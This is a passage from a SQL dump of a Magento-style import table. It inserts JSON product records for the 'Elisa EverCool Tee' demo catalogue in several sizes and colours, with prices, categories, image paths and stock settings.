":{\"sku\":\"WS06-XS-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Elisa EverCool&trade; Tee-XS-Gray\",\"description\":\"<p>When rising temps threaten to melt you down, Elisa EverCool&trade; Tee brings serious relief. Moisture-wicking fabric pulls sweat away from your skin, while the innovative seams hug your muscles to enhance your range of motion.<\\/p>\\n<p>&bull; Purple heather v-neck tee.<br \\/>&bull; Short-Sleeves.<br \\/>&bull; Luma EverCool&trade; fabric. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"elisa-evercool-trade-tee-xs-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Gray\"},\"1399\":{\"sku\":\"WS06-XS-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Elisa EverCool&trade; Tee-XS-Purple\",\"description\":\"<p>When rising temps threaten to melt you down, Elisa EverCool&trade; Tee brings serious relief. Moisture-wicking fabric pulls sweat away from your skin, while the innovative seams hug your muscles to enhance your range of motion.<\\/p>\\n<p>&bull; Purple heather v-neck tee.<br \\/>&bull; Short-Sleeves.<br \\/>&bull; Luma EverCool&trade; fabric. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"elisa-evercool-trade-tee-xs-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws06-purple_back.jpg\",\"image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Purple\"}}');
INSERT INTO `importexport_importdata` (`id`, `entity`, `behavior`, `data`) VALUES
(15, 'catalog_product', 'append', '{\"1400\":{\"sku\":\"WS06-XS-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Elisa EverCool&trade; Tee-XS-Red\",\"description\":\"<p>When rising temps threaten to melt you down, Elisa EverCool&trade; Tee brings serious relief. Moisture-wicking fabric pulls sweat away from your skin, while the innovative seams hug your muscles to enhance your range of motion.<\\/p>\\n<p>&bull; Purple heather v-neck tee.<br \\/>&bull; Short-Sleeves.<br \\/>&bull; Luma EverCool&trade; fabric. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"elisa-evercool-trade-tee-xs-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XS,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XS\",\"color\":\"Red\"},\"1401\":{\"sku\":\"WS06-S-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Elisa EverCool&trade; Tee-S-Gray\",\"description\":\"<p>When rising temps threaten to melt you down, Elisa EverCool&trade; Tee brings serious relief. Moisture-wicking fabric pulls sweat away from your skin, while the innovative seams hug your muscles to enhance your range of motion.<\\/p>\\n<p>&bull; Purple heather v-neck tee.<br \\/>&bull; Short-Sleeves.<br \\/>&bull; Luma EverCool&trade; fabric. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"elisa-evercool-trade-tee-s-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Gray\"},\"1402\":{\"sku\":\"WS06-S-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Elisa EverCool&trade; Tee-S-Purple\",\"description\":\"<p>When rising temps threaten to melt you down, Elisa EverCool&trade; Tee brings serious relief. Moisture-wicking fabric pulls sweat away from your skin, while the innovative seams hug your muscles to enhance your range of motion.<\\/p>\\n<p>&bull; Purple heather v-neck tee.<br \\/>&bull; Short-Sleeves.<br \\/>&bull; Luma EverCool&trade; fabric. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"elisa-evercool-trade-tee-s-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws06-purple_back.jpg\",\"image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"1403\":{\"sku\":\"WS06-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Elisa EverCool&trade; Tee-S-Red\",\"description\":\"<p>When rising temps threaten to melt you down, Elisa EverCool&trade; Tee brings serious relief. Moisture-wicking fabric pulls sweat away from your skin, while the innovative seams hug your muscles to enhance your range of motion.<\\/p>\\n<p>&bull; Purple heather v-neck tee.<br \\/>&bull; Short-Sleeves.<br \\/>&bull; Luma EverCool&trade; fabric. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"elisa-evercool-trade-tee-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"1404\":{\"sku\":\"WS06-M-Gray\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Elisa EverCool&trade; Tee-M-Gray\",\"description\":\"<p>When rising temps threaten to melt you down, Elisa EverCool&trade; Tee brings serious relief. Moisture-wicking fabric pulls sweat away from your skin, while the innovative seams hug your muscles to enhance your range of motion.<\\/p>\\n<p>&bull; Purple heather v-neck tee.<br \\/>&bull; Short-Sleeves.<br \\/>&bull; Luma EverCool&trade; fabric. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"elisa-evercool-trade-tee-m-gray\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Gray\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws06-gray_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Gray\"},\"1405\":{\"sku\":\"WS06-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Elisa EverCool&trade; Tee-M-Purple\",\"description\":\"<p>When rising temps threaten to melt you down, Elisa EverCool&trade; Tee brings serious relief. Moisture-wicking fabric pulls sweat away from your skin, while the innovative seams hug your muscles to enhance your range of motion.<\\/p>\\n<p>&bull; Purple heather v-neck tee.<br \\/>&bull; Short-Sleeves.<br \\/>&bull; Luma EverCool&trade; fabric. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"elisa-evercool-trade-tee-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/w\\/s\\/ws06-purple_back.jpg\",\"image\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/w\\/s\\/ws06-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/w\\/s\\/ws06-purple_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"1406\":{\"sku\":\"WS06-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Women\\/Tops\\/Tees,Default Category\\/Promotions\\/Tees,Default Category\\/Collections\\/New Luma Yoga Collection,Default Category\\/Collections\\/Eco Friendly,Default Category\",\"product_websites\":\"base\",\"name\":\"Elisa EverCool&trade; Tee-M-Red\",\"description\":\"<p>When rising temps threaten to melt you down, Elisa EverCool&trade; Tee brings serious relief. Moisture-wicking fabric pulls sweat away from your skin, while the innovative seams hug your muscles to enhance your range of motion.<\\/p>\\n<p>&bull; Purple heather v-neck tee.<br \\/>&bull; Short-Sleeves.<br \\/>&bull; Luma EverCool&trade; fabric. <br \\/>&bull; Machine wash\\/line dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"29\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"elisa-evercool-trade-tee-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/w\\/s\\/ws06-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"u